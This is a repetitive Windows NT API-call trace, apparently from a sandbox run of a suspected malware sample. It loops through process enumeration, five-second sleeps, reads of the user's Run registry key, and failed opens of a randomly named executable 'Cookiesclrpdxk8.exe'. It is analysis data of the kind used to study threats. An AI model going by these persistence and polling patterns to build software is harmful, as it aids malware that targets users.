NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.045] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.053] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.053] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.053] NtClose (Handle=0x338) returned 0x0 [0297.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.053] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.053] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0297.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.053] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.053] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0297.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.156] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.157] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.158] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.158] NtClose (Handle=0x338) returned 0x0 [0297.158] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.158] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.159] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0297.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.159] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.159] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de220) returned 1 [0297.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.259] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.260] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.261] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.261] NtClose (Handle=0x338) returned 0x0 [0297.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.261] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.261] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0297.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.261] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.261] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0297.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.363] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.365] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.365] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.365] NtClose (Handle=0x338) returned 0x0 [0297.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.365] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.365] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0297.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.365] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.365] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0297.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.469] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.471] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.472] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.472] NtClose (Handle=0x338) returned 0x0 [0297.472] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.472] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.473] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0297.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.473] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.473] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0297.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.573] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.574] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.575] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.575] NtClose (Handle=0x338) returned 0x0 [0297.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.575] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.575] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0297.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.575] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.575] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0297.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.677] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.679] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.679] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.679] NtClose (Handle=0x338) returned 0x0 [0297.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 